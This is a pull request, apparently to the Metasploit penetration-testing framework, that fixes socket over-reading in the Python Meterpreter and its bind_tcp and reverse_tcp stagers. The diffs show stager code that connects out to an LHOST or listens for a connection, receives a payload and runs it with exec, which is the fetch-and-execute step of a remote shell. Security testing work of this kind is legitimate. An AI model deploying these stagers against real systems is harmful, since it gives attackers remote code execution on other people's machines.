### PR TITLE
Python Meterpreter - Prevent Over-reading

### DIFF
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -478,7 +478,8 @@ class PythonMeterpreter(object):
 			pkt_length, pkt_type = struct.unpack('>II', packet)
 			pkt_length -= 8
 			packet = bytes()
-			packet += self.socket.recv(pkt_length)
+			while len(packet) < pkt_length:
+				packet += self.socket.recv(pkt_length - len(packet))
 		return packet
 
 	def send_packet_tcp(self, packet):

--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -478,8 +478,7 @@ class PythonMeterpreter(object):
 			pkt_length, pkt_type = struct.unpack('>II', packet)
 			pkt_length -= 8
 			packet = bytes()
-			while len(packet) < pkt_length:
-				packet += self.socket.recv(4096)
+			packet += self.socket.recv(pkt_length)
 		return packet
 
 	def send_packet_tcp(self, packet):

--- a/modules/payloads/stagers/python/bind_tcp.rb
+++ b/modules/payloads/stagers/python/bind_tcp.rb
@@ -36,9 +36,9 @@ module Metasploit3
     cmd << "s.listen(1)\n"
     cmd << "c,a=s.accept()\n"
     cmd << "l=struct.unpack('>I',c.recv(4))[0]\n"
-    cmd << "d=c.recv(4096)\n"
-    cmd << "while len(d)!=l:\n"
-    cmd << "\td+=c.recv(4096)\n"
+    cmd << "d=c.recv(min(4096,l))\n"
+    cmd << "while len(d)<l:\n"
+    cmd << "\td+=c.recv(min(4096,l-len(d)))\n"
     cmd << "exec(d,{'s':c})\n"
 
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop

--- a/modules/payloads/stagers/python/bind_tcp.rb
+++ b/modules/payloads/stagers/python/bind_tcp.rb
@@ -36,9 +36,9 @@ module Metasploit3
     cmd << "s.listen(1)\n"
     cmd << "c,a=s.accept()\n"
     cmd << "l=struct.unpack('>I',c.recv(4))[0]\n"
-    cmd << "d=c.recv(min(4096,l))\n"
+    cmd << "d=c.recv(l)\n"
     cmd << "while len(d)<l:\n"
-    cmd << "\td+=c.recv(min(4096,l-len(d)))\n"
+    cmd << "\td+=c.recv(l-len(d))\n"
     cmd << "exec(d,{'s':c})\n"
 
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop

--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -34,9 +34,9 @@ module Metasploit3
     cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
     cmd << "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
     cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
-    cmd << "d=s.recv(4096)\n"
-    cmd << "while len(d)!=l:\n"
-    cmd << "\td+=s.recv(4096)\n"
+    cmd << "d=s.recv(l)\n"
+    cmd << "while len(d)<l:\n"
+    cmd << "\td+=s.recv(l-len(d))\n"
     cmd << "exec(d,{'s':s})\n"
 
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop


### PR DESCRIPTION
Over-reading from a stream (socket) prevents using python meterpreter over a tunnel. 
